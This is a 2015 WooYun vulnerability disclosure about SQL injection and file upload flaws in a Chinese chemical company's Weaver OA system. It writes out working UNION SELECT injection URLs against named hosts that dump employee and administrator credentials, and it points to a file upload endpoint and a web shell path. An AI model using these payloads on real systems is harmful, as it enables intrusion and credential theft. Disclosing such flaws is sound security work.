当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0159108

漏洞标题:川恒某系统某系统SQL注入导敏感信息泄露

相关厂商:四川川恒化工股份有限公司

漏洞作者: CapsLk

提交时间:2015-12-08 09:23

修复时间:2015-12-13 09:24

公开时间:2015-12-13 09:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-08: 细节已通知厂商并且等待厂商处理中
2015-12-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

主站801端口泛微OA
http://www.chanhen.com:801/web/careerapply/HrmCareerApplyPerView.jsp?id=1
通过编辑添加一行信息后,就可以注入了
直接上手工,全部人员信息
http://www.chanhen.com:801/web/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,loginid,password,lastname,6,7%20from%20HrmResource
管理员信息
http://www.chanhen.com:801/web/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,loginid,password,lastname,6,7%20from%20HrmResourceManager
好多弱口令,登陆OA,大量敏感的文件~~~~~,包括企业的组织架构
sysadmin XXX103 登陆后台,各种敏感信息
2、http://xd.chanhen.com/web/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,loginid,password,lastname,6,7%20from%20HrmResource
http://xd.chanhen.com/web/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,loginid,password,lastname,6,7%20from%20HrmResourcemanager
可以从数据库中拿到部分员工的邮箱帐号,密码是md5
[email protected]
wkxxxxx 后面隐去
从邮箱中得到大量的工作的敏感信息~~~
3、http://xd.chanhen.com/messager/users.data 这里泄露了各种人员信息
http://www.chanhen.com:801/messager/users.data
4.http://ecis.chanhen.com:89 与xd的OA数据相通,可以直接登陆,里面有手机通信的信息
5、任意文件上传
http://www.chanhen.com:801/tools/SWFUpload/upload.jsp
shell
http://www.chanhen.com:801/nullwoo.jsp 已经发现被入侵痕迹

漏洞证明:

1.PNG


2.PNG


3.PNG


34.PNG


系统权限。。。。

3.PNG

修复方案:

好像有8.0了,升级吧。。

版权声明:转载请注明来源 CapsLk@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-12-13 09:24

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

2015-12-16:已处理,感谢!